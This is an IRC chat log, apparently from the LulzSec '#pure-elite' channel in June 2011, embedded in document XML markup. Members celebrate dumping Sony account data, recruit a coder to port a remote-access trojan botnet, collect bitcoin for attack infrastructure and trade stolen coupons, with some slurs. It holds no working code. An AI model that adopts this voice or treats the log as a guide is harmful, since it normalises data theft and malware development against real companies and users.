        <w:t>Jun 02 13:30:12 Topiary nothing man, just letting you know thanks for the Sony dumpage Jun 02 13:30:15 Topiary we got it all ready to ship out Jun 02 13:30:20 Recursion not a problem Jun 02 13:30:28 Recursion I'm still pulling more accounts, btw Jun 02 13:30:44 Topiary should be enough Jun 02 13:30:47 Topiary we got it all archived/sorted Jun 02 13:31:51 Recursion lulzsecurity.com is down :( Jun 02 13:32:06 Topiary should be back up Jun 02 13:32:17 Recursion 500 Internal Server Error Jun 02 13:32:18 Recursion nginx/1.0.4 Jun 02 13:32:39 &lt;hsien&gt; ;/ Jun 02 13:47:41 joepie92 Jun 02 13:49:28 Recursion welp Jun 02 13:49:31 Recursion I just puked...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 13:49:36 Recursion no idea why Jun 02 13:50:57 neuron Topiary: lulzsecurity is our site?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 13:51:10 Topiary yeah Jun 02 13:51:19 neuron \o/ Jun 02 13:51:43 neuron ;( sorry Recursion ..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 13:52:46 neuron Topiary: website is offline Jun 02 13:52:50 neuron no cahced version avalible Jun 02 13:53:19 Topiary yarp, our website beast is putting it behind cloudfire Jun 02 13:53:29 neuron whos are website beast?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 13:54:20 Recursion just came up for me Jun 02 13:55:20 joepie92 works here now Jun 02 13:55:31 joepie92 cloudflare = win Jun 02 13:55:32 joepie92 imo Jun 02 13:55:46 Recursion also, fucking lul on the Friday song Jun 02 13:55:49 Recursion who did this?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 13:55:54 Recursion they deserve mad props.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 13:57:00 Topiary he goes by many names _________ Jun 02 13:57:10 Topiary one of them is tflow, in fact all of them are tflow Jun 02 13:57:23 * lol gives channel operator status to [redacted] Neuron Jun 02 13:57:38 neuron still trying to load Jun 02 13:59:02 Topiary y so opendns Jun 02 14:21:43 joepie92 Topiaryone of them is tflow, in fact all of them are tflow Jun 02 14:21:44 joepie92 lol'd Jun 02 14:29:29 Topiary site is back up Jun 02 14:31:29 joepie92 Topiary, where is it hosted?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:31:48 Topiary one of our sexy boxes of sex Jun 02 14:31:49 joepie92 also, pm Jun 02 14:31:52 Topiary also cocks Jun 02 14:33:06 * anonny (anonny@HA-qg9.p22.ibfo0m.IP) has joined #pure- elite Jun 02 14:33:15 * anonny is now known as kl0ps Jun 02 14:33:19 kl0ps hello o/ Jun 02 14:34:32 * pwnsauce (pwnsauce@HA-qu1.ba8.pn6gun.IP) has joined #pure- elite Jun 02 14:35:02 pwnsauce hey :D Jun 02 14:35:20 pwnsauce Neuron - hows it all workin?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:35:24 kl0ps hi pwnsauce Jun 02 14:37:20 lol hello pwnsauce hello kl0ps :D Jun 02 14:37:24 lol whats new :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:37:43 kl0ps whats new? i wanna hug u :D Jun 02 14:37:54 * lol gives channel operator status to kl0ps pwnsauce Jun 02 14:38:18 lol \:D/ Jun 02 14:38:35 kl0ps \o/ Jun 02 14:39:42 pwnsauce hey there :D Jun 02 14:39:58 pwnsauce kl0ps... where does I know you from?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:40:00 pwnsauce BTW Jun 02 14:40:17 lol kl0ps is from #internetfeds :D Jun 02 14:40:22 pwnsauce Ah!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:40:26 Topiary pwnsauce Jun 02 14:40:26 pwnsauce Now I remember!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:40:28 kl0ps yeah :D Jun 02 14:40:34 pwnsauce S'up Topiary!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:40:36 pwnsauce BTW Jun 02 14:40:36 Topiary http://lulzsecurity.com/ Jun 02 14:40:39 Topiary let it flow Jun 02 14:40:41 Topiary it tflows back to you Jun 02 14:40:41 pwnsauce Onesecc :D Jun 02 14:41:02 pwnsauce Onesec im Whoissing that lol Jun 02 14:41:07 pwnsauce ill flip if my d0x are on it Jun 02 14:41:12 joepie92 FUCKING lold @ pastebin tweet Jun 02 14:41:20 Topiary haha yep Jun 02 14:41:24 joepie92 "ohey we don't care you put illegal shit on our servers lol" Jun 02 14:41:32 Topiary they really don't give a fuck Jun 02 14:41:34 joepie92 ahaha Jun 02 14:41:40 joepie92 be aware that ryan has admin thar though Jun 02 14:41:42 joepie92 :P Jun 02 14:41:46 Topiary oh lordy Jun 02 14:41:56 joepie92 on the other hand Jun 02 14:42:02 joepie92 he's probably minecrafting Jun 02 14:42:23 pwnsauce LMAO!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:42:29 pwnsauce BTW Guys Jun 02 14:42:43 pwnsauce I need a good coder, who writes in C++ and understands VB.NET Jun 02 14:42:55 pwnsauce one who is careful and is willing to help on a project for us Jun 02 14:43:01 pwnsauce PHP skills are a bonus Jun 02 14:43:25 pwnsauce I have a VB.net RAT/botnet here, I need to modify it, improve it, and turn it into C++ Jun 02 14:43:40 pwnsauce for a little idea I had that I need to talk to Sabu about Jun 02 14:43:58 Topiary &lt;prosi&gt; hey sir, are you there?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:43:58 Topiary &lt;whirlpool&gt; word ninja Jun 02 14:43:58 Topiary &lt;prosi&gt; I respect you guys a lot and I don't want to hide anything to you Jun 02 14:43:58 Topiary &lt;prosi&gt; &gt;.&gt; Jun 02 14:43:58 Topiary &lt;prosi&gt; so I'm telling you this Jun 02 14:43:58 Topiary &lt;prosi&gt; I'm one of them faggot anonymous, atleast I do the propaganda part for them Jun 02 14:44:02 joepie92 I understand VB.net but don't write C++ Jun 02 14:44:02 Topiary &lt;prosi&gt; but I'm no hacker n shit Jun 02 14:44:04 Topiary &lt;prosi&gt; : Jun 02 14:44:26 pwnsauce joepie92 - :D now we need the C++ guy!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:44:29 joepie92 lol Jun 02 14:44:33 joepie92 tbh Jun 02 14:44:37 joepie92 anything you could write in vb.net Jun 02 14:44:42 joepie92 would probably be just as easy to replicate in C++ Jun 02 14:44:45 joepie92 as without an example Jun 02 14:44:53 joepie92 -as Jun 02 14:45:21 joepie92 why am I 92 again Jun 02 14:45:22 joepie92 o_O Jun 02 14:45:24 * joepie92 is now known as joepie91 Jun 02 14:45:39 pwnsauce hmmmmm. thing is, it aint my code im playing with. its just ecode to use as a "base" Jun 02 14:45:46 Topiary Jester = milw0rm + slowloris + Tor, Python = VB.net + JS, joepie91 + cage = gorilla habitat Jun 02 14:46:07 joepie91 lolwat Jun 02 14:46:13 joepie91 that actually took me some time to interpret Jun 02 14:46:30 pwnsauce lolwtfbbq?!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:47:00 joepie91 k guys, I have to work on interpreting Iran emails for a bit Jun 02 14:47:02 * joepie91 brb Jun 02 14:47:14 pwnsauce kk Jun 02 14:47:29 pwnsauce kayla - if you or kl0ps know anyone...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:47:32 Topiary Whirlpool&gt; that's cool, how are things going over at Anon?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 14:47:32 Topiary &lt;prosi&gt; it's all slow n shit. you are under the spot light these days.. lol so we are keeping it down Jun 02 14:47:32 Topiary &lt;prosi&gt; but greece fags are trying to attack IMF Jun 02 14:47:32 Topiary &lt;prosi&gt; that's all Jun 02 14:47:32 Topiary &lt;prosi&gt; :) Jun 02 14:47:32 Topiary &lt;whirlpool&gt; I hear you guys hacked HBGary Jun 02 14:47:41 * Topiary waits for something no doubt lulzy Jun 02 14:47:51 pwnsauce xD Jun 02 14:48:08 kl0ps i am sry :( Jun 02 14:48:11 Topiary &lt;prosi&gt; yeah.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:08:55 * Disconnected (Invalid argument).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>* * ** ENDING LOGGING AT Thu Jun 2 15:08:55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15:15:22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15:15:22 * Now talking on #pure-elite Jun 02 15:15:22 * Topic for #pure-elite is: pE | no leaks | respect each other | research and exploit development++ Jun 02 15:15:22 * Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Thu Jun 2 00:21:58 2011 Jun 02 15:15:39 Recursion hey, when is the leak going to hit?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:15:46 neuron l2 hours Jun 02 15:15:57 * Recursion giggles with anticipation Jun 02 15:15:57 Recursion awww Jun 02 15:30:40 * Disconnected (Invalid argument).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>* * ** ENDING LOGGING AT Thu Jun 2 15:30:40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Thu Jun 2 15:34:10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15:34:10 * Now talking on #pure-elite Jun 02 15:34:10 * Topic for #pure-elite is: pE | no leaks | respect each other | research and exploit development++ Jun 02 15:34:10 * Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Thu Jun 2 00:21:58 2011 Jun 02 15:35:09 joepie91 ye Jun 02 15:35:10 joepie91 I lold Jun 02 15:35:14 joepie91 pastebin is like Jun 02 15:35:16 joepie91 TRAFFIC NOM Jun 02 15:35:21 trollpoll hahahah Jun 02 15:35:28 trollpoll they love lulz xD Jun 02 15:35:36 joepie91 and traffic Jun 02 15:35:39 joepie91 especially traffic Jun 02 15:35:42 trollpoll sure Jun 02 15:35:45 joepie91 srsly, the owner of pastebin is just as bad as ryan Jun 02 15:35:45 joepie91 in that Jun 02 15:35:51 trollpoll ahahha Jun 02 15:35:53 joepie91 traffic nom nom nom Jun 02 15:36:06 trollpoll r u at 2600?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:36:10 joepie91 I am, I am Jun 02 15:36:16 trollpoll how is the chan now?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:36:22 trollpoll hundreds?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:36:32 joepie91 110 Jun 02 15:36:35 trollpoll omg Jun 02 15:36:47 trollpoll im going as "arrrrr" Jun 02 15:36:49 joepie91 inb4 opers mad Jun 02 15:36:50 joepie91 lolk Jun 02 15:37:13 neuron joinin 2600!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:39:37 neuron op captainjack Jun 02 15:41:01 joepie91 &lt;whirlpool&gt;this channel is more successful than 2600 itself Jun 02 15:41:03 joepie91 I think Jun 02 15:41:05 joepie91 that is the only reason Jun 02 15:41:09 joepie91 we haven't been booted yet Jun 02 15:41:11 joepie91 from 2600 Jun 02 15:41:11 joepie91 lol Jun 02 15:41:15 trollpoll hahaha Jun 02 15:41:21 joepie91 TRAFFIC NOM Jun 02 15:41:22 joepie91 lol Jun 02 15:41:26 neuron op CaptainJack! :P Jun 02 15:47:18 sabu 2600 liks them sex Jun 02 15:47:32 neuron lol yup Jun 02 15:52:11 &lt;hsien&gt; how many people are there?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:52:30 neuron 114 Jun 02 15:52:33 neuron join the lulz Jun 02 15:52:36 neuron pick a pirate name Jun 02 15:55:15 joepie91 I'm sort of tempted Jun 02 15:55:17 joepie91 to pick a pirate name Jun 02 15:55:22 joepie91 but that might blow a potential cover Jun 02 15:55:22 joepie91 lol Jun 02 15:56:49 &lt;hsien&gt; lol k can i be johnny depp?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:57:02 &lt;hsien&gt; hes a pirate right?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:58:27 trollpoll i have a very good name of pirate Jun 02 15:58:28 trollpoll Jammie Thomas-Rasset Jun 02 15:58:30 trollpoll xDDDDD Jun 02 15:58:51 Recursion who the fuck is ShadowDXS?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 15:59:09 neuron guy from anonops hes cool Jun 02 15:59:23 joepie91 mk Jun 02 15:59:24 Recursion ok Jun 02 15:59:24 Recursion lol Jun 02 15:59:29 joepie91 I estimate to have dinged a few xchat clients Jun 02 15:59:31 joepie91 with that bell character Jun 02 15:59:32 joepie91 :D Jun 02 16:03:12 neuron how long till drop?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:05:18 neuron make sure to post your bitcoin address to :P Jun 02 16:11:24 trollpoll btw Jun 02 16:11:40 trollpoll did you read the NATO doc about anonymous? Jun 02 16:11:51 trollpoll they will put tanks on our houses????</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:12:14 trollpoll http://www.thinq.co.uk/2011/6/1/nato-report- threatens-persecute-anonymous/ Jun 02 16:12:26 neuron lol Jun 02 16:15:00 joepie91 lol Jun 02 16:15:03 joepie91 post bitcoin address Jun 02 16:15:03 joepie91 kgo Jun 02 16:15:08 joepie91 in #lulzsec Jun 02 16:15:14 joepie91 Topiary Jun 02 16:15:15 joepie91 fgt Jun 02 16:15:20 joepie91 post bitcoin address kgo Jun 02 16:16:38 Topiary okay Jun 02 16:16:54 neuron we need pastehtml and pastebin single leaks :D Jun 02 16:17:37 [redacted] they will put tanks in our houses Jun 02 16:17:43 [redacted] we will put penis's in their mouths Jun 02 16:18:26 lol Obama will be like "lol you just ddos my server?" *nuke* Jun 02 16:22:17 pwnsauce LOL Jun 02 16:22:33 joepie91 just wondering Jun 02 16:22:34 joepie91 is that data Jun 02 16:22:36 joepie91 actual PSN data?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:22:56 joepie91 because I thought the web services were decoupled from PSN Jun 02 16:23:06 trollpoll guys, you are epic Jun 02 16:27:22 neuron did someone post a bitcoin address?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:27:25 joepie91 is "kardus" one of you?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:27:27 joepie91 and no, noone did Jun 02 16:27:28 joepie91 -_- Jun 02 16:27:31 neuron joepie91: Jun 02 16:27:33 neuron post Jun 02 16:27:33 neuron :P Jun 02 16:27:36 neuron or i will Jun 02 16:27:38 joepie91 lemme make an address Jun 02 16:27:41 neuron kk Jun 02 16:27:42 Recursion http://www.reddit.com/r/netsec/comments/hq6xq/lulzsec_compromises_sony_again_twitter/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16:27:43 Recursion :D Jun 02 16:27:48 neuron lmfao Jun 02 16:27:53 joepie91 1BUYwuagdWXnvBaPdTmu25cztifFLAJHXw Jun 02 16:27:55 joepie91 kgo Jun 02 16:28:03 Recursion I know a kardus....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:28:03 joepie91 look at it in blockexplorer to see how much you got Jun 02 16:28:04 joepie91 :D Jun 02 16:28:16 Recursion from partyvan.fm Jun 02 16:28:19 Recursion like, years ago Jun 02 16:29:23 neuron joepie91: there you go people are starting to donate Jun 02 16:29:42 joepie91 seeing first one Jun 02 16:29:57 neuron joepie91: we will use whatevers donated for shells or some shit. or send them to sabu for later use Jun 02 16:30:08 joepie91 ya Jun 02 16:30:11 joepie91 I'll forward all of it Jun 02 16:30:13 joepie91 to one of you guys Jun 02 16:30:28 joepie91 or Topiary or sth Jun 02 16:30:32 joepie91 I think he did bitcoin stuff Jun 02 16:30:33 joepie91 so far Jun 02 16:31:05 neuron yeah Jun 02 16:31:59 neuron Sabu: Op me so i can get donations plox Jun 02 16:32:26 Topiary 1Ahou81cHECe2nBWYSAiwbCMg5aQB9Gh2a Jun 02 16:32:30 Topiary is our bitcoin Jun 02 16:33:10 neuron whoop late for that Jun 02 16:33:22 neuron Topiary: loging and op and post it Jun 02 16:33:37 joepie91 I'll forward the 0.04 Jun 02 16:33:38 joepie91 1 sec Jun 02 16:33:39 neuron Op me if you can Jun 02 16:34:01 joepie91 Topiary, the 0.04 that came in on my address is coming your way :P Jun 02 16:34:11 sabu hopefully we get some good donations Jun 02 16:34:16 sabu so we can buy more vpns and shit Jun 02 16:34:24 neuron yup Jun 02 16:34:24 joepie91 be sure to op all lulzsec people Jun 02 16:34:25 neuron \o/ Jun 02 16:34:27 joepie91 in #lulzsec Jun 02 16:34:28 Topiary oh lawdy Jun 02 16:34:35 joepie91 prevents confusion Jun 02 16:34:38 neuron yeah its kinda hard when people are pming asking why your not opped :P Jun 02 16:34:38 Topiary okay call yourselves out with "scurvy" right now Jun 02 16:34:50 sabu no one talk in 2600 just focus here Jun 02 16:34:53 sabu let everyone go crazy Jun 02 16:35:24 * Recursion_ (gibby@HA-b7o.3p2.0g9blo.IP) has joined #pure- elite Jun 02 16:35:30 &lt;recursion_&gt; thats weird Jun 02 16:35:40 &lt;recursion_&gt; hey, Sabu, or an IRC op Jun 02 16:35:48 &lt;recursion_&gt; can you /kill Recursion Jun 02 16:35:49 neuron haha Sabu hows the traffic?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:36:21 joepie91 &lt;kardus&gt;implying they aren't already shitting houses from the last 10 sites compromised ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:36:21 joepie91 &lt;kardus&gt;with another 2 about to be released soon? Jun 02 16:36:21 joepie91 &lt;kardus&gt;:P Jun 02 16:36:34 joepie91 &lt;kardus&gt;didn't even find out where to use the coupons yet Jun 02 16:36:34 joepie91 &lt;kardus&gt;didn't work with their music store or their amazon link thing Jun 02 16:36:51 joepie91 &lt;kardus&gt;they are valid coupons, it checks against the amazon database and says it's valid, they just dont work for some reason Jun 02 16:36:52 joepie91 &lt;kardus&gt;nah Jun 02 16:36:52 joepie91 &lt;kardus&gt;tried a week ago Jun 02 16:36:52 joepie91 &lt;sanchaz&gt;kardus: was this realeased a week ago? Jun 02 16:36:52 joepie91 &lt;kardus&gt;and while the db was being dumped new entries were being added Jun 02 16:36:52 joepie91 &lt;kardus&gt;nope Jun 02 16:36:52 joepie91 &lt;kardus&gt;well, not to the public Jun 02 16:37:07 joepie91 &lt;sanchaz&gt;u part of lulz?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:37:08 joepie91 &lt;kardus&gt;i'm neither here nor there Jun 02 16:37:08 joepie91 &lt;kardus&gt;sir Jun 02 16:37:24 neuron who is kardus?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:37:37 trollpoll and where is talking?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:38:22 joepie91 #Frantech Jun 02 16:38:23 joepie91 on dairc Jun 02 16:38:31 joepie91 I am wondering who he is too Jun 02 16:38:37 joepie91 Sabu ding Jun 02 16:38:39 sabu hi Jun 02 16:38:42 joepie91 read above Jun 02 16:38:52 sabu I think thats kaylas friend she gave someone some coupons Jun 02 16:39:00 sabu if hes talking publicly Jun 02 16:39:04 sabu kayla will talk to him Jun 02 16:39:17 joepie91 it's #Frantech Jun 02 16:39:19 joepie91 on Dairc Jun 02 16:39:22 joepie91 aka buyvm Jun 02 16:39:31 sabu aka kayla/lol and paste her log Jun 02 16:39:34 sabu if its her friend Jun 02 16:39:47 trollpoll hmm... guys you are everywhere.. :S Jun 02 16:39:48 &lt;recursion_&gt; Sabu: are you an IRCop?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:39:58 * joepie91 doubts she has "lol" on highlight Jun 02 16:40:03 &lt;recursion_&gt; lol Jun 02 16:40:07 &lt;recursion_&gt; &gt;.&gt; Jun 02 16:40:16 joepie91 trollpoll: I am connected to like 13 networks atm Jun 02 16:40:21 &lt;recursion_&gt; also, joepie91, where is Kardus? Jun 02 16:40:24 trollpoll omg Jun 02 16:40:30 &lt;recursion_&gt; err Jun 02 16:40:30 joepie91 sometimes up to 25 networks Jun 02 16:40:31 Topiary http://twitter.com/#!/aaronbarr/status/76387343350759424 Jun 02 16:40:34 &lt;recursion_&gt; joepie91: rather Jun 02 16:40:37 joepie91 I tend to keep an eye on channels everywhere Jun 02 16:40:38 trollpoll do you have 6 hands?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
